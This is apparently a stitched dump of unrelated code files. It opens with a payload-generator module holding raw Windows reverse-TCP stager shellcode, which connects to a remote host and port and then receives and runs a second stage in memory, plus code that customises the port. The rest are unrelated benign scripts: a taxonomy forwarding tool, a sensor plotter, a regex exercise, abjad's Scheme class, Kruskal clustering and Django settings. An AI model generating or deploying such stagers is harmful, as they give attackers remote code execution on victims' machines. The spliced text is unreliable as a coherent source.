b"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
b"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
b"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
b"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
b"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
b"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
b"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
b"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
b"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
b"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" +
b"\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" +
b"\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" +
b"\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" +
b"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
b"\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
b"\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" +
b"\x29\xC6\x85\xF6\x75\xEC\xC3")
self.required_options = {
"LPORT": ["", "LPORT value"],
"Encoder": ["None", "Optional: Encoder to use when avoiding bad characters"],
"BadChars": ["\\x00", "Optional: Bad characters to avoid"],
"RHOST": ["", "RHOST value"]
}
def cli_gen_shellcode(self):
'''Invokes payload generating function since nothing special is needed
for cli specifically'''
self.payload_gen()
return
def gen_shellcode(self):
'''Invoked by main menu, generates code'''
self.payload_gen()
return
def payload_gen(self):
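        # Convert LPORT into two hex bytes (network byte order) and splice them into the stager at port_offset.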
port_shellcode_stage = str(hex(int(self.required_options['LPORT'][0])).lstrip('0'))
if len(port_shellcode_stage.lstrip('x')) == 3:
            # odd number of hex digits, so pad with a leading '0'
port_1half = '0' + port_shellcode_stage[0:2].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[2:4]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 4:
port_1half = port_shellcode_stage[1:3]
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[3:5]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 2:
port_1half = port_shellcode_stage[1:3].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = '00'
port_2half = '\\x' + port_2half
port_shellcode = port_2half + port_1half
elif len(port_shellcode_stage.lstrip('x')) == 1:
port_1half = port_shellcode_stage.lstrip('x')
port_1half = '\\x0' + port_1half
port_2half = '\\x00'
port_shellcode = port_2half + port_1half
stager_shellcode = codecs.encode(self.stager[0:self.port_offset], 'hex')
stager_shellcode = "\\x" + '\\x'.join(codecs.decode(stager_shellcode[i:i + 2], 'utf-8') for i in range(0, len(stager_shellcode), 2))
stager_shellcode += port_shellcode
part_2 = codecs.encode(self.stager[self.port_offset + 2:], 'hex')
part_2 = "\\x" + '\\x'.join(codecs.decode(part_2[i:i + 2], 'utf-8') for i in range(0, len(part_2), 2))
stager_shellcode += part_2
self.customized_shellcode = stager_shellcode
return
def print_shellcode(self):
print(self.customized_shellcode)
return
def payload_stats(self):
print(" [*] Payload Name: " + helpers.color(self.name))
print(" [*] Port: " + helpers.color(str(self.required_options['LPORT'][0])))
print(" [*] Shellcode Size: " + helpers.color(str(len(self.customized_shellcode) / 4).rstrip('.0') + '\n'))
print(self.customized_shellcode)
return
| gpl-3.0 | -1,086,560,340,512,147,300 | 47.884615 | 140 | 0.584579 | false | 2.50814 | false | false | false |
OpenTreeOfLife/reference-taxonomy | util/get_forwards.py | 1 | 1148 | import csv, sys
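# Merge taxon-id forwarding tables and write them out with chains collapsed (id -> final target).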
forwards = {}
# Load legacy forwards
def load_forwards(filename):
infile = open(filename, 'r')
load_forwards_from_stream(infile)
infile.close()
def load_forwards_from_stream(infile):
reader = csv.reader(infile, delimiter='\t')
idcolumn = 0
repcolumn = 1
for row in reader:
if row[idcolumn].isdigit():
forwards[row[idcolumn]] = row[repcolumn]
else:
idcolumn = row.index('id')
repcolumn = row.index('replacement')
# load_forwards(sys.argv[1])
# load_forwards(sys.argv[2])
# want binary mode for output...
def dump_forwards_to_stream(outfile):
writer = csv.writer(outfile, delimiter='\t')
writer.writerow(('id', 'replacement'))
for id in forwards:
target = forwards[id]
i = 0
while target in forwards:
i += 1
if i > 100:
print '** probably cycle', id
break
target = forwards[target]
writer.writerow((id, target))
load_forwards_from_stream(sys.stdin)
outfile = open(sys.argv[1], 'wb')
dump_forwards_to_stream(outfile)
outfile.close()
| bsd-2-clause | 5,068,023,480,321,642,000 | 23.425532 | 52 | 0.597561 | false | 3.679487 | false | false | false |
adjih/openlab | appli/iotlab_examples/smart_tiles/plot_sensors.py | 4 | 4668 | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" plot_sensors.py <filename> <node_id> ...
plot sensors values from <node_id> printed by smart_tiles firmware
saved in filename (by serial_aggregator)
Example of use :
    After firmware deployment on m3-29 to m3-32
mypc> aggr.sh 29 30 31 32 > data.txt
    mypc> python plot_sensors.py data.txt 29 30 31 32
"""
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
FIELDS = {'time': 0, 'name': 1, 'type': 2, 'X': 3, 'Y': 4, 'Z': 5}
def imu_load(filename):
""" Load iot-lab imu file
Parameters:
------------
filename: string
imu filename saved from smart_tiles firmware
Returns:
-------
data : numpy array
[timestamp node_name sensor_type X Y Z]
"""
try:
mytype = [('time', '<f8'), ('name', '|S11'), ('type', '|S11'),
('X', '<f8'), ('Y', '<f8'), ('Z', '<f8')]
# pylint:disable=I0011,E1101
data = np.genfromtxt(filename, skip_header=1, invalid_raise=False,
delimiter=";", dtype=mytype)
except IOError as err:
sys.stderr.write("Error opening oml file:\n{0}\n".format(err))
sys.exit(2)
except (ValueError, StopIteration) as err:
sys.stderr.write("Error reading oml file:\n{0}\n".format(err))
sys.exit(3)
# Start time to 0 sec
data['time'] = data['time'] - data['time'][0]
return data
def imu_extract(data, node_name='', sensor_type='Acc'):
""" Extract iot-lab imu data for node_name, sensor_type
Parameters:
------------
data: numpy array
[time name type X Y Z]
node_name: string
name of the iot-lab name to be extracted
sensor_type: string
type of the sensor to be extracted 'Acc' or 'Mag'
"""
if node_name != '':
condition = data['name'] == node_name
# pylint:disable=I0011,E1101
filtname_data = np.extract(condition, data)
else:
filtname_data = data
condition = filtname_data['type'] == sensor_type
# pylint:disable=I0011,E1101
filt_data = np.extract(condition, filtname_data)
return filt_data
def imu_plot(data, title):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
"""
plt.figure()
plt.grid()
plt.title(title)
plt.plot(data['time'], data['X'])
plt.plot(data['time'], data['Y'])
plt.plot(data['time'], data['Z'])
plt.xlabel('Sample Time (sec)')
return
def imu_all_plot(data, title, ylabel, nodes, sensor_type):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
ylabel: stringx
ylabel of the plot
nodes: tab of string
list of nodes_names
"""
nbplots = len(nodes)
if nbplots > 0:
plt.figure()
i = 0
for node in nodes:
i = i + 1
node_plot = plt.subplot(nbplots, 1, i)
node_plot.grid()
plt.title(title + nodes[i-1])
datanode = imu_extract(data, nodes[i-1], sensor_type)
peaknode = imu_extract(data, nodes[i-1], sensor_type+'Peak')
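            # peak detections are logged with sensor type '<type>Peak'; their X column appears to hold the peak value plotted below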
print nodes[i-1], len(datanode)
norm = np.sqrt(datanode['X']**2 + datanode['Y']**2
+ datanode['Z']**2)
node_plot.plot(datanode['time'], norm)
node_plot.plot(peaknode['time'], peaknode['X'], 'ro')
plt.ylabel(ylabel)
plt.xlabel('Sample Time (sec)')
return
def usage():
"""Usage command print
"""
print "Usage"
print __doc__
if __name__ == "__main__":
if len(sys.argv) <= 2:
usage()
else:
filename = sys.argv[1]
# Verif the file existence
if not os.path.isfile(filename):
usage()
sys.exit(1)
# Nodes list
        nodes = []
for arg in sys.argv[2:]:
nodes.append('m3-'+arg)
# extract data from file
data = imu_load(filename)
# Plot all sensors acc sensors
for node in nodes:
#datanode = imu_extract(data, node, sensor_type='Acc')
#imu_plot(datanode, "Accelerometers " + node)
datanode = imu_extract(data, node, sensor_type='Mag')
imu_plot(datanode, "Magnetometers " + node)
# Plot all norm accelerometers on a same windows
#imu_all_plot(data, "Accelerometers ", "Norm Acceleration (G)", nodes, 'Acc')
imu_all_plot(data, "Magnetometers ", "Norm ", nodes, 'Mag')
plt.show()
| gpl-3.0 | 3,069,637,162,765,641,700 | 26.139535 | 87 | 0.550985 | false | 3.447563 | false | false | false |
salceson/kompilatory | lab1/zad1.py | 1 | 4434 | __author__ = 'Piotr Moczurad and Michal Ciolczyk'
import os
import sys
import re
import codecs
re_flags = re.MULTILINE | re.U
author_pattern = re.compile(r'<META NAME="AUTOR" CONTENT="(.+)">', re_flags)
dept_pattern = re.compile(r'<META NAME="DZIAL" CONTENT="(.+)">', re_flags)
key_pattern = re.compile(r'<META NAME="KLUCZOWE_?\d*" CONTENT="(.+)">', re_flags)
text_pattern = re.compile(r'<P>(.+)<META NAME="AUTOR"', re_flags | re.DOTALL)
phrase_pattern = re.compile(r'([\w \-+*:,;\.]+)([\.?!]+|$)', re_flags)
abbrev_pattern = re.compile(r'\s\w{1,4}\.', re_flags)
#easier to see on debuggex.com
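# num_pattern matches integers in the signed 16-bit range (-32768..32767)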
num_pattern = re.compile(
r'-32768|[-\s](3276[0-7]|327[0-5]\d|327[0-5]\d{2}|32[0-6]\d{3}|3[0-1]\d{4}|[1-2]?\d{1,4})(([.,;:]\s)|\s)', re_flags)
float_pattern = re.compile(r'(-?(\d+\.\d*|\.\d+)(?:(e|E)\-?\d+)?)[.,;:]?\s', re_flags)
#the regexes below are only readable on debuggex
dates_pattern = re.compile(
r'(?P<yearA>\d{4})(?P<separatorA>[-\./])((?P<monthA1>0[13578]|1[02])'
r'(?P=separatorA)(?P<dayA1>[0-2]\d|3[0-1])|((?P<monthA2>0[469]|11)'
r'(?P=separatorA)(?P<dayA2>[0-2]\d|30))|((?P<monthA3>02)(?P=separatorA)'
r'(?P<dayA3>[0-1]\d|2[0-9])))|((?P<dayB1>[0-2]\d|3[0-1])'
r'(?P<separatorB1>[-\./])(?P<monthB1>0[13578]|1[02])|(?P<dayB2>[0-2]\d|30)'
r'(?P<separatorB2>[-\./])(?P<monthB2>0[469]|11)|(?P<dayB3>[0-1]\d|2[0-9])'
r'(?P<separatorB3>[-\./])(?P<monthB3>02))((?P=separatorB1)|(?P=separatorB2)|(?P=separatorB3))'
r'(?P<yearB>\d{4})',
re_flags) # TODO: Fix accepting 00 as day
emails_pattern = re.compile(
r'([A-Za-z0-9+\-]([A-Za-z0-9+\-]|[A-Za-z0-9+\-\.][A-Za-z0-9+\-])+'
r'@[A-Za-z0-9]([A-Za-z\.0-9][A-Za-z0-9]|[A-Za-z0-9])*\.[A-Za-z0-9]{2,4})',
re_flags)
# it is also enforced that an e-mail address must end with a TLD
def my_match(pattern, content):
match = pattern.search(content)
if match:
return match.groups()[0]
else:
return ""
def multi_match(pattern, content):
matches = re.findall(pattern, content)
return ", ".join(matches)
def count_matches(pattern, content):
match = pattern.findall(content)
if match:
return len(match)
else:
return 0
def count_different_matches(pattern, content):
match = pattern.findall(content)
if match:
s = set()
for x in match:
s.add(x)
return len(s)
else:
return 0
def count_different_dates(content):
matches = dates_pattern.finditer(content)
if matches:
s = set()
for match in matches:
day = ""
month = ""
year = ""
groups = match.groupdict()
for g in groups:
v = groups[g]
if g[0:3] == "day" and v is not None:
day = v
elif g[0:5] == "month" and v is not None:
month = v
elif g[0:4] == "year" and v is not None:
year = v
s.add(year + "-" + month + "-" + day)
return len(s)
else:
return 0
def count_ints(content):
ints = map(lambda m: m[0] if isinstance(m, tuple) else m,
num_pattern.findall(content))
return len(set(ints))
def process_file(file_path):
fp = codecs.open(file_path, 'rU', 'iso-8859-2')
content = fp.read()
#
# INSERT YOUR CODE HERE
#
fp.close()
    print("file name: " + file_path)
    print("author: " + my_match(author_pattern, content))
    print("section: " + my_match(dept_pattern, content))
    print("keywords: " + multi_match(key_pattern, content))
    text = my_match(text_pattern, content)
    print("number of sentences: " + str(count_matches(phrase_pattern, text)))
    print("number of abbreviations: " + str(count_different_matches(abbrev_pattern, text)))
    print("number of integers in int range: " + str(count_ints(text)))
    print("number of floating-point numbers: " + str(count_different_matches(float_pattern, text)))
    print("number of dates: " + str(count_different_dates(text)))
    print("number of e-mail addresses: " + str(count_different_matches(emails_pattern, text)))
    print("\n")
try:
path = sys.argv[1]
except IndexError:
    print("No directory name given")
sys.exit(0)
tree = os.walk(path)
for root, dirs, files in tree:
for f in files:
if f.endswith(".html"):
filepath = os.path.join(root, f)
process_file(filepath) | mit | -8,817,545,450,034,686,000 | 31.851852 | 120 | 0.566306 | false | 2.687273 | false | false | false |
andrewyoung1991/abjad | abjad/tools/schemetools/Scheme.py | 1 | 10687 | # -*- encoding: utf-8 -*-
from abjad.tools import stringtools
from abjad.tools.abctools import AbjadValueObject
class Scheme(AbjadValueObject):
r'''Abjad model of Scheme code.
.. container:: example
**Example 1.** A Scheme boolean value:
::
>>> scheme = schemetools.Scheme(True)
>>> print(format(scheme))
##t
.. container:: example
**Example 2.** A nested Scheme expession:
::
>>> scheme = schemetools.Scheme(
... ('left', (1, 2, False)),
... ('right', (1, 2, 3.3))
... )
>>> print(format(scheme))
#((left (1 2 #f)) (right (1 2 3.3)))
.. container:: example
**Example 3.** A variable-length argument:
::
>>> scheme_1 = schemetools.Scheme(1, 2, 3)
>>> scheme_2 = schemetools.Scheme((1, 2, 3))
>>> format(scheme_1) == format(scheme_2)
True
Scheme wraps nested variable-length arguments in a tuple.
.. container:: example
**Example 4.** A quoted Scheme expression:
::
>>> scheme = schemetools.Scheme((1, 2, 3), quoting="'#")
>>> print(format(scheme))
#'#(1 2 3)
Use the `quoting` keyword to prepend Scheme's various quote, unquote,
unquote-splicing characters to formatted output.
.. container:: example
**Example 5.** A Scheme expression with forced quotes:
::
>>> scheme = schemetools.Scheme('nospaces', force_quotes=True)
>>> print(format(scheme))
#"nospaces"
Use this in certain \override situations when LilyPond's Scheme
interpreter treats unquoted strings as symbols instead of strings.
The string must contain no whitespace for this to work.
.. container:: example
**Example 6.** A Scheme expression of LilyPond functions:
::
>>> function_1 = 'tuplet-number::append-note-wrapper'
>>> function_2 = 'tuplet-number::calc-denominator-text'
>>> string = schemetools.Scheme('4', force_quotes=True)
>>> scheme = schemetools.Scheme(
... function_1,
... function_2,
... string,
... )
>>> scheme
Scheme('tuplet-number::append-note-wrapper', 'tuplet-number::calc-denominator-text', Scheme('4', force_quotes=True))
>>> print(format(scheme))
#(tuplet-number::append-note-wrapper tuplet-number::calc-denominator-text "4")
.. container:: example
**Example 7.** A Scheme lambda expression of LilyPond function that
takes a markup with a quoted string argument. Setting verbatim to true
causes the expression to format exactly as-is without modifying quotes
or whitespace:
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> scheme = schemetools.Scheme(string, verbatim=True)
>>> scheme
Scheme('(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #"noteheads.s0harmonic" #}))')
>>> print(format(scheme))
#(lambda (grob) (grob-interpret-markup grob #{ \markup \musicglyph #"noteheads.s0harmonic" #}))
Scheme objects are immutable.
'''
### CLASS VARIABLES ###
__slots__ = (
'_force_quotes',
'_quoting',
'_value',
'_verbatim',
)
### INITIALIZER ###
def __init__(self, *args, **kwargs):
if 1 == len(args):
if isinstance(args[0], type(self)):
args = args[0]._value
else:
args = args[0]
quoting = kwargs.get('quoting')
force_quotes = bool(kwargs.get('force_quotes'))
verbatim = kwargs.get('verbatim')
assert isinstance(quoting, (str, type(None)))
if quoting is not None:
assert all(x in ("'", ',', '@', '`', '#') for x in quoting)
self._force_quotes = force_quotes
self._quoting = quoting
self._value = args
self._verbatim = bool(verbatim)
### SPECIAL METHODS ###
def __format__(self, format_specification=''):
r'''Formats scheme.
        Set `format_specification` to `''`, `'lilypond'` or `'storage'`.
        Interprets `''` as `'lilypond'`.
.. container:: example
**Example 1.** Scheme LilyPond format:
::
>>> scheme = schemetools.Scheme('foo')
>>> format(scheme)
'#foo'
.. container:: example
**Example 2.** Scheme storage format:
::
>>> print(format(scheme, 'storage'))
schemetools.Scheme(
'foo'
)
Returns string.
'''
from abjad.tools import systemtools
if format_specification in ('', 'lilypond'):
return self._lilypond_format
elif format_specification == 'storage':
return systemtools.StorageFormatManager.get_storage_format(self)
return str(self)
def __getnewargs__(self):
r'''Gets new arguments.
Returns tuple.
'''
return (self._value,)
def __str__(self):
r'''String representation of scheme object.
Returns string.
'''
if self._quoting is not None:
return self._quoting + self._formatted_value
return self._formatted_value
### PRIVATE PROPERTIES ###
@property
def _formatted_value(self):
from abjad.tools import schemetools
return schemetools.Scheme.format_scheme_value(
self._value,
force_quotes=self.force_quotes,
verbatim=self.verbatim,
)
@property
def _lilypond_format(self):
if self._quoting is not None:
return '#' + self._quoting + self._formatted_value
return '#%s' % self._formatted_value
@property
def _storage_format_specification(self):
from abjad.tools import systemtools
if stringtools.is_string(self._value):
positional_argument_values = (self._value,)
else:
positional_argument_values = self._value
keyword_argument_names = []
if self.force_quotes:
keyword_argument_names.append('force_quotes')
if self.quoting:
keyword_argument_names.append('quoting')
return systemtools.StorageFormatSpecification(
self,
keyword_argument_names=keyword_argument_names,
positional_argument_values=positional_argument_values,
)
### PUBLIC METHODS ###
@staticmethod
def format_embedded_scheme_value(value, force_quotes=False):
r'''Formats `value` as an embedded Scheme value.
'''
from abjad.tools import datastructuretools
from abjad.tools import schemetools
result = Scheme.format_scheme_value(value, force_quotes=force_quotes)
if isinstance(value, bool):
result = '#{}'.format(result)
elif isinstance(value, datastructuretools.OrdinalConstant):
result = '#{}'.format(repr(value).lower())
elif isinstance(value, str) and not force_quotes:
result = '#{}'.format(result)
elif isinstance(value, schemetools.Scheme):
result = '#{}'.format(result)
return result
@staticmethod
def format_scheme_value(value, force_quotes=False, verbatim=False):
r'''Formats `value` as Scheme would.
.. container:: example
**Example 1.** Some basic values:
::
>>> schemetools.Scheme.format_scheme_value(1)
'1'
::
>>> schemetools.Scheme.format_scheme_value('foo')
'foo'
::
>>> schemetools.Scheme.format_scheme_value('bar baz')
'"bar baz"'
::
>>> schemetools.Scheme.format_scheme_value([1.5, True, False])
'(1.5 #t #f)'
.. container:: example
**Example 2.** Strings without whitespace can be forcibly quoted
via the `force_quotes` keyword:
::
>>> schemetools.Scheme.format_scheme_value(
... 'foo',
... force_quotes=True,
... )
'"foo"'
.. container:: example
**Example 3.** Set verbatim to true to format value exactly (with
only hash preprended):
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> schemetools.Scheme.format_scheme_value(string)
'"(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #\\"noteheads.s0harmonic\\" #}))"'
Returns string.
'''
from abjad.tools import schemetools
if isinstance(value, str) and not verbatim:
value = value.replace('"', r'\"')
if -1 == value.find(' ') and not force_quotes:
return value
return '"{}"'.format(value)
elif isinstance(value, str) and verbatim:
return value
elif isinstance(value, bool):
if value:
return '#t'
return '#f'
elif isinstance(value, (list, tuple)):
return '({})'.format(
' '.join(schemetools.Scheme.format_scheme_value(x)
for x in value))
elif isinstance(value, schemetools.Scheme):
return str(value)
elif isinstance(value, type(None)):
return '#f'
return str(value)
### PUBLIC PROPERTIES ###
@property
def force_quotes(self):
r'''Is true when quotes should be forced in output. Otherwise false.
Returns boolean.
'''
return self._force_quotes
@property
def quoting(self):
r'''Gets Scheme quoting string.
Return string.
'''
return self._quoting
@property
def verbatim(self):
r'''Is true when formatting should format value absolutely verbatim.
Whitespace, quotes and all other parts of value are left in tact.
Defaults to false.
Set to true or false.
Returns true or false.
'''
return self._verbatim | gpl-3.0 | 7,986,514,970,599,183,000 | 29.27762 | 128 | 0.536353 | false | 4.353157 | false | false | false |
manikTharaka/al-go-rithms | greedy/kruskal's_algorithm/python/ArthurFortes/algorithmKruskal.py | 4 | 1445 | """
Computer Science Department (SCC)
Mathematics and Computer Science Institute (ICMC)
University of Sao Paulo (USP)
Algorithms Projects
Teacher: Gustavo Batista
Author: Arthur Fortes da Costa
Method Kruskal
"""
from vertexFunctions import *
from readFile import readFile
from unionFind import unionFind
from operator import itemgetter
def kruskal(nodes, edges, cluster):
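    # Kruskal with union-find, stopped early: merge edges until exactly 'cluster' components remain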
forest = unionFind()
mst = []
for n in nodes:
forest.add(n)
sz = len(nodes) - 1
for e in sorted(edges, key=itemgetter(2)):
n1, n2, _ = e
t1 = forest.find(n1)
t2 = forest.find(n2)
if t1 != t2:
mst.append(e)
sz -= 1
if sz == (cluster-1):
return mst
forest.union(t1, t2)
edges = []
nodes = []
edges, nodes, vertex = readFile("base.txt")
result = kruskal(nodes, edges, 7)
buildVertex(vertex)
addNeighbor(result)
ColorVertex()
resp = open("kruskalCut.txt", 'w')
for u in range(len(k)):
resp.write(str(k[u].no)+str("\n"))
    resp.write(str("Coordinate: ")+str("(")+str(k[u].dx)+str(", ")+ str(k[u].dy)+str(")")+str("\n"))
    resp.write(str("Neighbors: ")+str(k[u].neighbor)+str("\n"))
    resp.write(str("Color: ")+str(k[u].color)+str("\n"))
resp.write(str("\n"))
resp.close()
dig = open("kruskal.txt", 'w')
for u in range(len(k)):
dig.write(str(k[u].dx)+str("\t")+str(k[u].dy)+str("\t")+str(k[u].color)+str("\n"))
dig.close()
| mit | 5,727,848,772,294,627,000 | 21.578125 | 100 | 0.59654 | false | 2.773512 | false | false | false |
Laendasill/diango_tutorial_test | mysite/settings.py | 1 | 2686 | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p+7p7lv_36$-f+@bw=verpk$o&e(#6@79et^7=819!_1i8vxnp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
| mit | 700,184,355,062,771,800 | 25.07767 | 71 | 0.689501 | false | 3.439181 | false | false | false |
mkessy/playlister-project | playlister/playlists/migrations/0004_auto__add_field_group_slug__add_field_playlist_slug__add_field_categor.py | 1 | 5260 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Group.slug'
db.add_column(u'playlists_group', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Playlist.slug'
db.add_column(u'playlists_playlist', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Category.slug'
db.add_column(u'playlists_category', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Group.slug'
db.delete_column(u'playlists_group', 'slug')
# Deleting field 'Playlist.slug'
db.delete_column(u'playlists_playlist', 'slug')
# Deleting field 'Category.slug'
db.delete_column(u'playlists_category', 'slug')
models = {
u'playlists.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'categoryid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Group']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the category'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'})
},
u'playlists.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groupid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'default': "'Some, key, words'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the group'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'stations': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Playlist']", 'symmetrical': 'False'})
},
u'playlists.playlist': {
'Meta': {'ordering': "['name']", 'object_name': 'Playlist'},
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'creator': ('django.db.models.fields.CharField', [], {'default': "'The creator of the playlist'", 'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'default': "'A description of the playlist'", 'max_length': '200'}),
'featured_artists': ('django.db.models.fields.CharField', [], {'default': "'A, list, of, the artists, formatted, like, this'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the playlist'", 'max_length': '200'}),
'playlistid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'song_count': ('django.db.models.fields.IntegerField', [], {}),
'songs': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['songs.Song']", 'symmetrical': 'False'}),
'songza_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'spotify_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'songs.song': {
'Meta': {'ordering': "['title']", 'object_name': 'Song'},
'album': ('django.db.models.fields.CharField', [], {'default': "'Album name'", 'max_length': '200'}),
'artist': ('django.db.models.fields.CharField', [], {'default': "'Artist name'", 'max_length': '200'}),
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'duration': ('django.db.models.fields.IntegerField', [], {}),
'genre': ('django.db.models.fields.CharField', [], {'default': "'Song genre'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'songid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Song title'", 'max_length': '200'})
}
}
complete_apps = ['playlists'] | mit | 6,291,368,834,679,632,000 | 60.894118 | 161 | 0.558935 | false | 3.730496 | false | false | false |
ekcs/congress | congress/tests/datasources/vCenter_fakes.py | 1 | 1093 | # Copyright (c) 2014 Marist SDN Innovation lab Joint with Plexxi Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
